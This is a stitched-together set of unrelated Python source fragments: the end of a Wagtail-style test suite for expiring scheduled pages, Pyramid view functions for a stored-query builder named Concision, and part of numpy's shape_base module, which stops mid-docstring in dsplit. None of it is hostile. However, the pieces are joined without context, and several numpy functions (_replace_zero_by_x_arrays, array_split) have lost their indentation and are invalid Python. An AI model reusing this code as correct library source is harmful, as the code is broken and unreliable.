        self.root_page.add_child(instance=page)
        p = Page.objects.get(slug='hello-world')
        self.assertTrue(p.live)
        management.call_command('publish_scheduled_pages')
        p = Page.objects.get(slug='hello-world')
        self.assertFalse(p.live)
        self.assertTrue(p.expired)
        # Check that the page_unpublished signal was fired
        # (the original comment incorrectly named page_published here).
        self.assertTrue(record['fired'])
        self.assertEqual(record['page'], page)
        self.assertEqual(record['page'], record['page'].specific)

    def test_future_expired_page_will_not_be_unpublished(self):
        page = SimplePage(
            title="Hello world!",
            slug="hello-world",
            live=True,
            expire_at=timezone.now() + timedelta(days=1),
        )
        self.root_page.add_child(instance=page)
        p = Page.objects.get(slug='hello-world')
        self.assertTrue(p.live)
        management.call_command('publish_scheduled_pages')
        p = Page.objects.get(slug='hello-world')
        # The expiry date is in the future, so the page stays live.
        self.assertTrue(p.live)
        self.assertFalse(p.expired)

    def test_expired_pages_are_dropped_from_mod_queue(self):
        page = SimplePage(
            title="Hello world!",
            slug="hello-world",
            live=False,
            expire_at=timezone.now() - timedelta(days=1),
        )
        self.root_page.add_child(instance=page)
        page.save_revision(submitted_for_moderation=True)
        p = Page.objects.get(slug='hello-world')
        self.assertFalse(p.live)
        self.assertTrue(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
        management.call_command('publish_scheduled_pages')
        p = Page.objects.get(slug='hello-world')
        # Expired pages must no longer sit in the moderation queue.
        self.assertFalse(PageRevision.objects.filter(page=p, submitted_for_moderation=True).exists())
|
|
from pyramid.httpexceptions import HTTPFound
# from pyramid.response import Response
from collections import defaultdict
from pyramid.renderers import get_renderer
from ..models import (
StoredQuery,
)
import json
from ..lib import (
html_f,
consts,
query_f,
converters,
filter_funcs,
# graphing,
# pretty_sql,
# joins,
display,
)
from .. import config
def list_queries(request):
    """List the stored queries created by the current user."""
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    # Only this user's queries, ordered alphabetically by name.
    query_list = (
        config['DBSession']
        .query(StoredQuery)
        .filter(StoredQuery.creator == the_user.id)
        .order_by(StoredQuery.name.asc())
    )
    return dict(
        title = "Concision queries",
        layout = layout,
        the_user = the_user,
        query_list = query_list,
    )
def new(request):
    """Create a new stored query and redirect to its overview page.

    On a plain GET (no ``form.submitted``), renders the name-entry form
    instead.
    """
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    if "form.submitted" in request.params:
        the_query = StoredQuery()
        the_query.name = request.params['name'].strip()
        the_query.creator = the_user.id
        # Start from an empty, normalized query structure.
        the_query.data = json.dumps(query_f.check_query_data({}))
        config['DBSession'].add(the_query)
        # NOTE(review): the new row's id is recovered by re-querying the
        # highest id for this creator rather than flushing the session and
        # reading the_query.id; under concurrent inserts by the same
        # creator this could pick up another row — confirm this is
        # acceptable or switch to a session flush.
        q = config['DBSession'].query(StoredQuery.id).filter(StoredQuery.creator == the_query.creator).order_by(StoredQuery.id.desc()).first()[0]
        return HTTPFound(location=request.route_url("concision.query.overview", query_id=q))
    return dict(
        title = "Query name",
        layout = layout,
        the_user = the_user,
    )
def overview(request):
    """Render the overview page for one stored query.

    Collects the query's tables, columns, filters, order-bys and key,
    plus the columns that could still be selected, and passes everything
    to the template.  (Dict keys in the return value are part of the
    template contract, including the 'seletable_columns' spelling.)
    """
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    query_id = int(request.matchdict['query_id'])
    the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
    data = the_query.extract_data()
    query_f.check_query_data(data)
    tablist = display.tablist(data)
    # Every column of every selected table, labelled
    # "<table label> <column label>" for the dropdowns.
    seletable_columns = []
    for t in data['tables']:
        the_source = config['sources'][t]
        seletable_columns.extend([("%s.%s" % (t, c), "%s %s" % (the_source.label, the_source.column_labels.get(c, c))) for c in the_source.columns])
    # The filter widgets carry a [query_id] placeholder in their links.
    filter_html = display.filter_html(data['filters']).replace("[query_id]", str(query_id))
    # Grouping by
    # NOTE(review): selected_columns is computed but never returned or
    # otherwise used below — confirm whether it is dead code that can be
    # removed.  The lambda's capture of the loop variable `s` is safe
    # because list(filter(...)) evaluates it within the same iteration.
    selected_columns = defaultdict(list)
    for s in data['tables']:
        prelude = lambda c: '%s.%s' % (s, c) in data.get('columns', []) or '%s.%s' % (s, c) == data.get('key', "")
        the_source = config['sources'][s]
        selected_columns[s] = list(filter(prelude, the_source.columns))
    return dict(
        title = "Concision query",
        layout = layout,
        the_user = the_user,
        the_query = the_query,
        data = data,
        tables = list(display.tables(data)),
        columns = list(display.columns(data)),
        filter_html = filter_html,
        orderbys = list(display.orderbys(data)),
        query_key = display.query_key(data),
        query_id = query_id,
        tablist = tablist,
        seletable_columns = seletable_columns,
        html_f = html_f,
        consts = consts,
    )
def tables(request):
    """Render the table-selection page for a stored query."""
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    query_id = int(request.matchdict['query_id'])
    the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
    data = the_query.extract_data()
    query_f.check_query_data(data)
    # Sources not already part of the query can still be added.
    seletable_tables = {
        name: source.label
        for name, source in config['sources'].items()
        if name not in data['tables']
    }
    return dict(
        title = "Concision query",
        layout = layout,
        the_user = the_user,
        the_query = the_query,
        data = data,
        tables = display.tables(data),
        seletable_tables = seletable_tables,
        html_f = html_f,
        consts = consts,
        query_id = query_id,
    )
def columns(request):
    """Render the column-selection page for a stored query."""
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    query_id = int(request.matchdict['query_id'])
    the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
    data = the_query.extract_data()
    query_f.check_query_data(data)
    # Every column of every selected table is offered, labelled as
    # "<table label> <column label>".
    seletable_columns = []
    for table_name in data['tables']:
        source = config['sources'][table_name]
        for col in source.columns:
            key = "%s.%s" % (table_name, col)
            label = "%s %s" % (source.label, source.column_labels.get(col, col))
            seletable_columns.append((key, label))
    return dict(
        title = "Concision query",
        layout = layout,
        the_user = the_user,
        the_query = the_query,
        data = data,
        columns = display.columns(data),
        seletable_columns = seletable_columns,
        html_f = html_f,
        consts = consts,
        query_id = query_id,
    )
def filters(request):
    """Render the filter-editing page for a stored query."""
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    query_id = int(request.matchdict['query_id'])
    the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
    data = the_query.extract_data()
    query_f.check_query_data(data)
    # Any column of any selected table can be used in a filter.
    seletable_filters = []
    for table_name in data['tables']:
        source = config['sources'][table_name]
        for col in source.columns:
            seletable_filters.append((
                "%s.%s" % (table_name, col),
                "%s %s" % (source.label, source.column_labels.get(col, col)),
            ))
    # The filter widgets carry a [query_id] placeholder in their links.
    filter_html = display.filter_html(data['filters']).replace("[query_id]", str(query_id))
    return dict(
        title = "Concision query",
        layout = layout,
        the_user = the_user,
        the_query = the_query,
        data = data,
        # filters = display.filters(data),
        filter_html = filter_html,
        seletable_filters = seletable_filters,
        html_f = html_f,
        consts = consts,
        query_id = query_id,
    )
def orderby(request):
    """Placeholder view: order-by editing is not implemented yet."""
    pass
def groupby(request):
    """Placeholder view: group-by editing is not implemented yet."""
    pass
def graphing(request):
    """Render the graphing page, offering key columns for the query."""
    the_user = config['get_user_func'](request)
    layout = get_renderer(config['layout']).implementation()
    query_id = int(request.matchdict['query_id'])
    the_query = config['DBSession'].query(StoredQuery).filter(StoredQuery.id == query_id).first()
    data = the_query.extract_data()
    query_f.check_query_data(data)
    # Only the key columns of the selected tables may act as graph keys.
    keyable_columns = []
    for t in data['tables']:
        the_source = config['sources'][t]
        keyable_columns.extend([("%s.%s" % (t, c), "%s %s" % (the_source.label, the_source.column_labels.get(c, c))) for c in the_source.keys])
    selected_key = None
    # Idiom fix: identity comparison with None instead of `!= None`.
    if data['key'] is not None:
        # converters.get_parts returns a (funcs, table, column) triple;
        # only table.column is needed to preselect the dropdown, so the
        # funcs part is discarded (the original bound it to an unused
        # `funcs` local).
        _funcs, t, c = converters.get_parts(data['key'])
        selected_key = "{}.{}".format(t, c)
    return dict(
        title = "Concision query",
        layout = layout,
        the_user = the_user,
        the_query = the_query,
        data = data,
        # filters = display.filters(data),
        keyable_columns = keyable_columns,
        selected_key = selected_key,
        html_f = html_f,
        consts = consts,
        query_id = query_id,
    )
|
|
import functools
import numpy.core.numeric as _nx
from numpy.core.numeric import (
asarray, zeros, outer, concatenate, array, asanyarray
)
from numpy.core.fromnumeric import reshape, transpose
from numpy.core.multiarray import normalize_axis_index
from numpy.core import overrides
from numpy.core import vstack, atleast_3d
from numpy.core.numeric import normalize_axis_tuple
from numpy.core.shape_base import _arrays_for_stack_dispatcher
from numpy.lib.index_tricks import ndindex
from numpy.matrixlib.defmatrix import matrix # this raises all the right alarm bells
__all__ = [
'column_stack', 'row_stack', 'dstack', 'array_split', 'split',
'hsplit', 'vsplit', 'dsplit', 'apply_over_axes', 'expand_dims',
'apply_along_axis', 'kron', 'tile', 'get_array_wrap', 'take_along_axis',
'put_along_axis'
]
array_function_dispatch = functools.partial(
overrides.array_function_dispatch, module='numpy')
def _make_along_axis_idx(arr_shape, indices, axis):
    # Build the fancy index that applies `indices` along `axis`: the
    # resulting tuple holds `indices` at position `axis` and
    # broadcast-shaped orthogonal aranges everywhere else.
    if not _nx.issubdtype(indices.dtype, _nx.integer):
        raise IndexError('`indices` must be an integer array')
    if len(arr_shape) != indices.ndim:
        raise ValueError(
            "`indices` and `arr` must have the same number of dimensions")
    ndim = indices.ndim
    ones = (1,) * ndim
    # Mark the requested axis with None so the loop below knows where to
    # insert `indices`; every other axis gets an arange reshaped to
    # broadcast along its own dimension only.
    dest_dims = list(range(axis)) + [None] + list(range(axis + 1, ndim))
    fancy_index = []
    for dim, n in zip(dest_dims, arr_shape):
        if dim is None:
            fancy_index.append(indices)
        else:
            bcast_shape = ones[:dim] + (-1,) + ones[dim + 1:]
            fancy_index.append(_nx.arange(n).reshape(bcast_shape))
    return tuple(fancy_index)
def _take_along_axis_dispatcher(arr, indices, axis):
    # __array_function__ dispatcher: only the array-like arguments are
    # relevant for dispatch; `axis` is a plain int.
    return (arr, indices)
@array_function_dispatch(_take_along_axis_dispatcher)
def take_along_axis(arr, indices, axis):
    """
    Take values from the input array by matching 1d index and data slices.

    This iterates over matching 1d slices oriented along the specified axis in
    the index and data arrays, and uses the former to look up values in the
    latter. These slices can be different lengths.

    Functions returning an index along an axis, like `argsort` and
    `argpartition`, produce suitable indices for this function.

    .. versionadded:: 1.15.0

    Parameters
    ----------
    arr : ndarray (Ni..., M, Nk...)
        Source array
    indices : ndarray (Ni..., J, Nk...)
        Indices to take along each 1d slice of `arr`. This must match the
        dimension of arr, but dimensions Ni and Nj only need to broadcast
        against `arr`.
    axis : int
        The axis to take 1d slices along. If axis is None, the input array is
        treated as if it had first been flattened to 1d, for consistency with
        `sort` and `argsort`.

    Returns
    -------
    out: ndarray (Ni..., J, Nk...)
        The indexed result.

    Notes
    -----
    This is equivalent to (but faster than) the following use of `ndindex` and
    `s_`, which sets each of ``ii`` and ``kk`` to a tuple of indices::

        Ni, M, Nk = a.shape[:axis], a.shape[axis], a.shape[axis+1:]
        J = indices.shape[axis]  # Need not equal M
        out = np.empty(Ni + (J,) + Nk)

        for ii in ndindex(Ni):
            for kk in ndindex(Nk):
                a_1d       = a      [ii + s_[:,] + kk]
                indices_1d = indices[ii + s_[:,] + kk]
                out_1d     = out    [ii + s_[:,] + kk]
                for j in range(J):
                    out_1d[j] = a_1d[indices_1d[j]]

    Equivalently, eliminating the inner loop, the last two lines would be::

        out_1d[:] = a_1d[indices_1d]

    See Also
    --------
    take : Take along an axis, using the same indices for every 1d slice
    put_along_axis :
        Put values into the destination array by matching 1d index and data slices

    Examples
    --------
    For this sample array

    >>> a = np.array([[10, 30, 20], [60, 40, 50]])

    We can sort either by using sort directly, or argsort and this function

    >>> np.sort(a, axis=1)
    array([[10, 20, 30],
           [40, 50, 60]])
    >>> ai = np.argsort(a, axis=1); ai
    array([[0, 2, 1],
           [1, 2, 0]])
    >>> np.take_along_axis(a, ai, axis=1)
    array([[10, 20, 30],
           [40, 50, 60]])

    The same works for max and min, if you expand the dimensions:

    >>> np.expand_dims(np.max(a, axis=1), axis=1)
    array([[30],
           [60]])
    >>> ai = np.expand_dims(np.argmax(a, axis=1), axis=1)
    >>> ai
    array([[1],
           [0]])
    >>> np.take_along_axis(a, ai, axis=1)
    array([[30],
           [60]])

    If we want to get the max and min at the same time, we can stack the
    indices first

    >>> ai_min = np.expand_dims(np.argmin(a, axis=1), axis=1)
    >>> ai_max = np.expand_dims(np.argmax(a, axis=1), axis=1)
    >>> ai = np.concatenate([ai_min, ai_max], axis=1)
    >>> ai
    array([[0, 1],
           [1, 0]])
    >>> np.take_along_axis(a, ai, axis=1)
    array([[10, 30],
           [40, 60]])
    """
    # normalize inputs
    if axis is None:
        # Flatten via .flat (a flatiter), avoiding a copy for the 1d view.
        arr = arr.flat
        arr_shape = (len(arr),)  # flatiter has no .shape
        axis = 0
    else:
        axis = normalize_axis_index(axis, arr.ndim)
        arr_shape = arr.shape
    # use the fancy index
    return arr[_make_along_axis_idx(arr_shape, indices, axis)]
def _put_along_axis_dispatcher(arr, indices, values, axis):
    # __array_function__ dispatcher: only the array-like arguments are
    # relevant for dispatch; `axis` is a plain int.
    return (arr, indices, values)
@array_function_dispatch(_put_along_axis_dispatcher)
def put_along_axis(arr, indices, values, axis):
    """
    Put values into the destination array by matching 1d index and data slices.

    This iterates over matching 1d slices oriented along the specified axis in
    the index and data arrays, and uses the former to place values into the
    latter. These slices can be different lengths.

    Functions returning an index along an axis, like `argsort` and
    `argpartition`, produce suitable indices for this function.

    .. versionadded:: 1.15.0

    Parameters
    ----------
    arr : ndarray (Ni..., M, Nk...)
        Destination array.
    indices : ndarray (Ni..., J, Nk...)
        Indices to change along each 1d slice of `arr`. This must match the
        dimension of arr, but dimensions in Ni and Nj may be 1 to broadcast
        against `arr`.
    values : array_like (Ni..., J, Nk...)
        values to insert at those indices. Its shape and dimension are
        broadcast to match that of `indices`.
    axis : int
        The axis to take 1d slices along. If axis is None, the destination
        array is treated as if a flattened 1d view had been created of it.

    Notes
    -----
    This is equivalent to (but faster than) the following use of `ndindex` and
    `s_`, which sets each of ``ii`` and ``kk`` to a tuple of indices::

        Ni, M, Nk = a.shape[:axis], a.shape[axis], a.shape[axis+1:]
        J = indices.shape[axis]  # Need not equal M

        for ii in ndindex(Ni):
            for kk in ndindex(Nk):
                a_1d       = a      [ii + s_[:,] + kk]
                indices_1d = indices[ii + s_[:,] + kk]
                values_1d  = values [ii + s_[:,] + kk]
                for j in range(J):
                    a_1d[indices_1d[j]] = values_1d[j]

    Equivalently, eliminating the inner loop, the last two lines would be::

        a_1d[indices_1d] = values_1d

    See Also
    --------
    take_along_axis :
        Take values from the input array by matching 1d index and data slices

    Examples
    --------
    For this sample array

    >>> a = np.array([[10, 30, 20], [60, 40, 50]])

    We can replace the maximum values with:

    >>> ai = np.expand_dims(np.argmax(a, axis=1), axis=1)
    >>> ai
    array([[1],
           [0]])
    >>> np.put_along_axis(a, ai, 99, axis=1)
    >>> a
    array([[10, 99, 20],
           [99, 40, 50]])
    """
    # normalize inputs
    if axis is None:
        # Write through the flat iterator so assignments hit `arr` in place.
        arr = arr.flat
        axis = 0
        arr_shape = (len(arr),)  # flatiter has no .shape
    else:
        axis = normalize_axis_index(axis, arr.ndim)
        arr_shape = arr.shape
    # use the fancy index
    arr[_make_along_axis_idx(arr_shape, indices, axis)] = values
def _apply_along_axis_dispatcher(func1d, axis, arr, *args, **kwargs):
    # __array_function__ dispatcher: only `arr` participates in dispatch.
    return (arr,)
@array_function_dispatch(_apply_along_axis_dispatcher)
def apply_along_axis(func1d, axis, arr, *args, **kwargs):
    """
    Apply a function to 1-D slices along the given axis.

    Execute `func1d(a, *args, **kwargs)` where `func1d` operates on 1-D arrays
    and `a` is a 1-D slice of `arr` along `axis`.

    This is equivalent to (but faster than) the following use of `ndindex` and
    `s_`, which sets each of ``ii``, ``jj``, and ``kk`` to a tuple of indices::

        Ni, Nk = a.shape[:axis], a.shape[axis+1:]
        for ii in ndindex(Ni):
            for kk in ndindex(Nk):
                f = func1d(arr[ii + s_[:,] + kk])
                Nj = f.shape
                for jj in ndindex(Nj):
                    out[ii + jj + kk] = f[jj]

    Equivalently, eliminating the inner loop, this can be expressed as::

        Ni, Nk = a.shape[:axis], a.shape[axis+1:]
        for ii in ndindex(Ni):
            for kk in ndindex(Nk):
                out[ii + s_[...,] + kk] = func1d(arr[ii + s_[:,] + kk])

    Parameters
    ----------
    func1d : function (M,) -> (Nj...)
        This function should accept 1-D arrays. It is applied to 1-D
        slices of `arr` along the specified axis.
    axis : integer
        Axis along which `arr` is sliced.
    arr : ndarray (Ni..., M, Nk...)
        Input array.
    args : any
        Additional arguments to `func1d`.
    kwargs : any
        Additional named arguments to `func1d`.

        .. versionadded:: 1.9.0

    Returns
    -------
    out : ndarray (Ni..., Nj..., Nk...)
        The output array. The shape of `out` is identical to the shape of
        `arr`, except along the `axis` dimension. This axis is removed, and
        replaced with new dimensions equal to the shape of the return value
        of `func1d`. So if `func1d` returns a scalar `out` will have one
        fewer dimensions than `arr`.

    See Also
    --------
    apply_over_axes : Apply a function repeatedly over multiple axes.

    Examples
    --------
    >>> def my_func(a):
    ...     \"\"\"Average first and last element of a 1-D array\"\"\"
    ...     return (a[0] + a[-1]) * 0.5
    >>> b = np.array([[1,2,3], [4,5,6], [7,8,9]])
    >>> np.apply_along_axis(my_func, 0, b)
    array([4., 5., 6.])
    >>> np.apply_along_axis(my_func, 1, b)
    array([2., 5., 8.])

    For a function that returns a 1D array, the number of dimensions in
    `outarr` is the same as `arr`.

    >>> b = np.array([[8,1,7], [4,3,9], [5,2,6]])
    >>> np.apply_along_axis(sorted, 1, b)
    array([[1, 7, 8],
           [3, 4, 9],
           [2, 5, 6]])

    For a function that returns a higher dimensional array, those dimensions
    are inserted in place of the `axis` dimension.

    >>> b = np.array([[1,2,3], [4,5,6], [7,8,9]])
    >>> np.apply_along_axis(np.diag, -1, b)
    array([[[1, 0, 0],
            [0, 2, 0],
            [0, 0, 3]],
           [[4, 0, 0],
            [0, 5, 0],
            [0, 0, 6]],
           [[7, 0, 0],
            [0, 8, 0],
            [0, 0, 9]]])
    """
    # handle negative axes
    arr = asanyarray(arr)
    nd = arr.ndim
    axis = normalize_axis_index(axis, nd)
    # arr, with the iteration axis at the end
    in_dims = list(range(nd))
    inarr_view = transpose(arr, in_dims[:axis] + in_dims[axis+1:] + [axis])
    # compute indices for the iteration axes, and append a trailing ellipsis to
    # prevent 0d arrays decaying to scalars, which fixes gh-8642
    inds = ndindex(inarr_view.shape[:-1])
    inds = (ind + (Ellipsis,) for ind in inds)
    # invoke the function on the first item
    try:
        ind0 = next(inds)
    except StopIteration as e:
        raise ValueError(
            'Cannot apply_along_axis when any iteration dimensions are 0'
        ) from None
    # The first result determines the output dtype and the trailing shape.
    res = asanyarray(func1d(inarr_view[ind0], *args, **kwargs))
    # build a buffer for storing evaluations of func1d.
    # remove the requested axis, and add the new ones on the end.
    # laid out so that each write is contiguous.
    # for a tuple index inds, buff[inds] = func1d(inarr_view[inds])
    buff = zeros(inarr_view.shape[:-1] + res.shape, res.dtype)
    # permutation of axes such that out = buff.transpose(buff_permute)
    buff_dims = list(range(buff.ndim))
    buff_permute = (
        buff_dims[0 : axis] +
        buff_dims[buff.ndim-res.ndim : buff.ndim] +
        buff_dims[axis : buff.ndim-res.ndim]
    )
    # matrices have a nasty __array_prepare__ and __array_wrap__
    if not isinstance(res, matrix):
        buff = res.__array_prepare__(buff)
    # save the first result, then compute and save all remaining results
    buff[ind0] = res
    for ind in inds:
        buff[ind] = asanyarray(func1d(inarr_view[ind], *args, **kwargs))
    if not isinstance(res, matrix):
        # wrap the array, to preserve subclasses
        buff = res.__array_wrap__(buff)
        # finally, rotate the inserted axes back to where they belong
        return transpose(buff, buff_permute)
    else:
        # matrices have to be transposed first, because they collapse dimensions!
        out_arr = transpose(buff, buff_permute)
        return res.__array_wrap__(out_arr)
def _apply_over_axes_dispatcher(func, a, axes):
    # __array_function__ dispatcher: only `a` takes part in dispatch.
    return (a,)
@array_function_dispatch(_apply_over_axes_dispatcher)
def apply_over_axes(func, a, axes):
    """
    Apply a function repeatedly over multiple axes.

    `func` is called as `res = func(a, axis)`, where `axis` is the first
    element of `axes`. The result `res` of the function call must have
    either the same dimensions as `a` or one less dimension. If `res`
    has one less dimension than `a`, a dimension is inserted before
    `axis`. The call to `func` is then repeated for each axis in `axes`,
    with `res` as the first argument.

    Parameters
    ----------
    func : function
        This function must take two arguments, `func(a, axis)`.
    a : array_like
        Input array.
    axes : array_like
        Axes over which `func` is applied; the elements must be integers.

    Returns
    -------
    apply_over_axis : ndarray
        The output array. The number of dimensions is the same as `a`,
        but the shape can be different. This depends on whether `func`
        changes the shape of its output with respect to its input.

    See Also
    --------
    apply_along_axis :
        Apply a function to 1-D slices of an array along the given axis.

    Notes
    -----
    This function is equivalent to tuple axis arguments to reorderable ufuncs
    with keepdims=True. Tuple axis arguments to ufuncs have been available since
    version 1.7.0.

    Examples
    --------
    >>> a = np.arange(24).reshape(2,3,4)
    >>> np.apply_over_axes(np.sum, a, [0,2])
    array([[[ 60],
            [ 92],
            [124]]])

    Tuple axis arguments to ufuncs are equivalent:

    >>> np.sum(a, axis=(0,2), keepdims=True)
    array([[[ 60],
            [ 92],
            [124]]])
    """
    val = asarray(a)
    # Bug fix: use the converted array's ndim. `a` may be a plain sequence
    # (list/tuple) that has no `.ndim` attribute; `asarray` was called for
    # exactly that reason.
    N = val.ndim
    # A scalar axis is promoted to a one-element tuple.
    if array(axes).ndim == 0:
        axes = (axes,)
    for axis in axes:
        if axis < 0:
            axis = N + axis
        args = (val, axis)
        res = func(*args)
        if res.ndim == val.ndim:
            val = res
        else:
            # func reduced the axis away; re-insert it so the rank is stable.
            res = expand_dims(res, axis)
            if res.ndim == val.ndim:
                val = res
            else:
                raise ValueError("function is not returning "
                                 "an array of the correct shape")
    return val
def _expand_dims_dispatcher(a, axis):
    # __array_function__ dispatcher: only `a` takes part in dispatch.
    return (a,)
@array_function_dispatch(_expand_dims_dispatcher)
def expand_dims(a, axis):
    """
    Expand the shape of an array.

    Insert new length-one axes so that they appear at the `axis`
    position(s) of the expanded array shape.

    Parameters
    ----------
    a : array_like
        Input array.
    axis : int or tuple of ints
        Position in the expanded axes where the new axis (or axes) is placed.

    Returns
    -------
    result : ndarray
        View of `a` with the number of dimensions increased.

    See Also
    --------
    squeeze : The inverse operation, removing singleton dimensions
    reshape : Insert, remove, and combine dimensions, and resize existing ones
    """
    # np.matrix is fixed at 2-D and cannot gain axes; demote it to ndarray.
    if isinstance(a, matrix):
        a = asarray(a)
    else:
        a = asanyarray(a)
    # NB: an exact type() check (not isinstance) mirrors the historical
    # treatment of tuple/list subclasses.
    if type(axis) not in (tuple, list):
        axis = (axis,)
    out_ndim = a.ndim + len(axis)
    axis = normalize_axis_tuple(axis, out_ndim)
    # Walk the original shape, inserting a 1 wherever a new axis was asked for.
    existing_dims = iter(a.shape)
    new_shape = [1 if pos in axis else next(existing_dims)
                 for pos in range(out_ndim)]
    return a.reshape(new_shape)
# Backward-compatible alias: stacking rows vertically is exactly `vstack`.
row_stack = vstack
def _column_stack_dispatcher(tup):
    # Delegate dispatch (and any deprecation warnings) to the shared helper.
    return _arrays_for_stack_dispatcher(tup)
@array_function_dispatch(_column_stack_dispatcher)
def column_stack(tup):
    """
    Stack 1-D arrays as columns into a 2-D array.

    1-D inputs are first turned into 2-D columns; 2-D inputs are stacked
    as-is, exactly like `hstack`.

    Parameters
    ----------
    tup : sequence of 1-D or 2-D arrays.
        Arrays to stack. All of them must have the same first dimension.

    Returns
    -------
    stacked : 2-D array
        The array formed by stacking the given arrays.

    See Also
    --------
    stack, hstack, vstack, concatenate
    """
    if not overrides.ARRAY_FUNCTION_ENABLED:
        # raise warning if necessary
        _arrays_for_stack_dispatcher(tup, stacklevel=2)
    columns = []
    for item in tup:
        as_arr = asanyarray(item)
        if as_arr.ndim < 2:
            # Promote to a column vector: build a row (ndmin=2), transpose.
            as_arr = array(as_arr, copy=False, subok=True, ndmin=2).T
        columns.append(as_arr)
    return _nx.concatenate(columns, 1)
def _dstack_dispatcher(tup):
    # Delegate dispatch (and any deprecation warnings) to the shared helper.
    return _arrays_for_stack_dispatcher(tup)
@array_function_dispatch(_dstack_dispatcher)
def dstack(tup):
    """
    Stack arrays in sequence depth wise (along third axis).

    Equivalent to concatenation along the third axis after `(M,N)` arrays
    are reshaped to `(M,N,1)` and `(N,)` arrays to `(1,N,1)`. Rebuilds
    arrays divided by `dsplit`.

    Parameters
    ----------
    tup : sequence of arrays
        The arrays must have the same shape along all but the third axis.
        1-D or 2-D arrays must have the same shape.

    Returns
    -------
    stacked : ndarray
        The array formed by stacking the given arrays, will be at least 3-D.

    See Also
    --------
    concatenate, stack, block, vstack, hstack, column_stack, dsplit
    """
    if not overrides.ARRAY_FUNCTION_ENABLED:
        # raise warning if necessary
        _arrays_for_stack_dispatcher(tup, stacklevel=2)
    expanded = atleast_3d(*tup)
    if not isinstance(expanded, list):
        # atleast_3d returns a bare array for a single input; normalize.
        expanded = [expanded]
    return _nx.concatenate(expanded, 2)
def _replace_zero_by_x_arrays(sub_arys):
for i in range(len(sub_arys)):
if _nx.ndim(sub_arys[i]) == 0:
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
elif _nx.sometrue(_nx.equal(_nx.shape(sub_arys[i]), 0)):
sub_arys[i] = _nx.empty(0, dtype=sub_arys[i].dtype)
return sub_arys
def _array_split_dispatcher(ary, indices_or_sections, axis=None):
    # Both the array and the indices may be overriding array-likes.
    return (ary, indices_or_sections)
@array_function_dispatch(_array_split_dispatcher)
def array_split(ary, indices_or_sections, axis=0):
"""
Split an array into multiple sub-arrays.
Please refer to the ``split`` documentation. The only difference
between these functions is that ``array_split`` allows
`indices_or_sections` to be an integer that does *not* equally
divide the axis. For an array of length l that should be split
into n sections, it returns l % n sub-arrays of size l//n + 1
and the rest of size l//n.
See Also
--------
split : Split array into multiple sub-arrays of equal size.
Examples
--------
>>> x = np.arange(8.0)
>>> np.array_split(x, 3)
[array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7.])]
>>> x = np.arange(9)
>>> np.array_split(x, 4)
[array([0, 1, 2]), array([3, 4]), array([5, 6]), array([7, 8])]
"""
try:
Ntotal = ary.shape[axis]
except AttributeError:
Ntotal = len(ary)
try:
# handle array case.
Nsections = len(indices_or_sections) + 1
div_points = [0] + list(indices_or_sections) + [Ntotal]
except TypeError:
# indices_or_sections is a scalar, not an array.
Nsections = int(indices_or_sections)
if Nsections <= 0:
raise ValueError('number sections must be larger than 0.') from None
Neach_section, extras = divmod(Ntotal, Nsections)
section_sizes = ([0] +
extras * [Neach_section+1] +
(Nsections-extras) * [Neach_section])
div_points = _nx.array(section_sizes, dtype=_nx.intp).cumsum()
sub_arys = []
sary = _nx.swapaxes(ary, axis, 0)
for i in range(Nsections):
st = div_points[i]
end = div_points[i + 1]
sub_arys.append(_nx.swapaxes(sary[st:end], axis, 0))
return sub_arys
def _split_dispatcher(ary, indices_or_sections, axis=None):
    # Both the array and the indices may be overriding array-likes.
    return (ary, indices_or_sections)
@array_function_dispatch(_split_dispatcher)
def split(ary, indices_or_sections, axis=0):
    """
    Split an array into multiple sub-arrays as views into `ary`.

    Like `array_split`, except that an integer `indices_or_sections`
    must divide the axis length exactly, otherwise ValueError is raised.

    Parameters
    ----------
    ary : ndarray
        Array to be divided into sub-arrays.
    indices_or_sections : int or 1-D array
        Number of equal sections, or sorted split points along `axis`.
    axis : int, optional
        The axis along which to split, default is 0.

    Returns
    -------
    sub-arrays : list of ndarrays
        A list of sub-arrays as views into `ary`.

    Raises
    ------
    ValueError
        If an integer section count does not divide the axis evenly.

    See Also
    --------
    array_split, hsplit, vsplit, dsplit, concatenate, stack
    """
    try:
        len(indices_or_sections)
    except TypeError:
        # An integer section count must divide the axis length exactly.
        n_parts = indices_or_sections
        if ary.shape[axis] % n_parts:
            raise ValueError(
                'array split does not result in an equal division') from None
    return array_split(ary, indices_or_sections, axis)
def _hvdsplit_dispatcher(ary, indices_or_sections):
    # Shared dispatcher for hsplit/vsplit/dsplit.
    return (ary, indices_or_sections)
@array_function_dispatch(_hvdsplit_dispatcher)
def hsplit(ary, indices_or_sections):
    """
    Split an array into multiple sub-arrays horizontally (column-wise).

    Equivalent to `split` with ``axis=1`` for arrays of two or more
    dimensions; 1-D arrays are split along their only axis.

    See Also
    --------
    split : Split an array into multiple sub-arrays of equal size.
    """
    if _nx.ndim(ary) == 0:
        raise ValueError('hsplit only works on arrays of 1 or more dimensions')
    # 1-D arrays have no second axis; fall back to the first.
    split_axis = 1 if ary.ndim > 1 else 0
    return split(ary, indices_or_sections, split_axis)
@array_function_dispatch(_hvdsplit_dispatcher)
def vsplit(ary, indices_or_sections):
    """
    Split an array into multiple sub-arrays vertically (row-wise).

    Equivalent to `split` with ``axis=0``; the array is always split
    along the first axis regardless of its dimension.

    See Also
    --------
    split : Split an array into multiple sub-arrays of equal size.
    """
    rank = _nx.ndim(ary)
    if rank < 2:
        raise ValueError('vsplit only works on arrays of 2 or more dimensions')
    return split(ary, indices_or_sections, 0)
@array_function_dispatch(_hvdsplit_dispatcher)
def dsplit(ary, indices_or_sections):
    """
    Split array into multiple sub-arrays along the 3rd axis (depth).

    Equivalent to `split` with ``axis=2``, for arrays of at least three
    dimensions.

    See Also
    --------
